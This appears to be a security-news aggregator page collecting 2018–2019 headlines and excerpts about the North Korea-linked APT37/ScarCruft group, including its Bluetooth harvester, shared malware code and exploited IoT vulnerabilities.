SecurityAffairs.webp 2019-05-14 12:48:00 North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal (lien direct) The North Korea-linked APT group ScarCruft (aka APT37 and Group123) continues to expand its arsenal by adding a Bluetooth Harvester. North Korea-linked APT group ScarCruft (aka APT37, Reaper, and Group123) continues to expand its arsenal by adding a Bluetooth Harvester. ScarCruft has been active since at least 2012, it made the headlines in early February […] Cloud APT 37
SecurityWeek.webp 2019-05-13 15:29:00 North Korea-Linked 'ScarCruft' Adds Bluetooth Harvester to Toolkit (lien direct) A North Korea-linked threat group tracked as ScarCruft, APT37 and Group123 continues to evolve and expand its toolkit, Kaspersky Lab reported on Monday. Threat Cloud APT 37
bleepingcomputer.webp 2018-10-01 11:00:00 Report Ties North Korean Attacks to New Malware, Linked by Word Macros (lien direct) Newly discovered malware from the world of cyberespionage connects the dots between the tools and operations of the little-known Reaper group believed to act on behalf of the North Korean government. [...] Malware Cloud APT 37
Checkpoint.webp 2018-08-15 12:30:04 July's Most Wanted Malware: Attacks Targeting IoT and Networking doubled since May 2018 (lien direct) Three IoT vulnerabilities entered July's top ten most exploited vulnerabilities list, as threat actors have doubled their attacks on these Mirai and Reaper-related vulnerabilities since May 2018. During July 2018, three IoT vulnerabilities entered the Top 10 most exploited list: MVPower DVR router Remote Code Execution at #5; D-Link DSL-2750B router Remote Command Execution… Threat Cloud APT 37
SecurityAffairs.webp 2018-08-10 16:15:03 The analysis of code reuse revealed many links between North Korean malware families (lien direct) Security researchers at Intezer and McAfee have conducted a joint investigation that allowed them to collect evidence linking malware families attributed to North Korean APT groups such as the notorious Lazarus Group and Group 123. The experts focused their analysis on code reuse; past investigations revealed that some APT groups share portions of code […] Malware Medical Cloud APT 38 APT 37
Last update at: 2024-06-02 19:08:21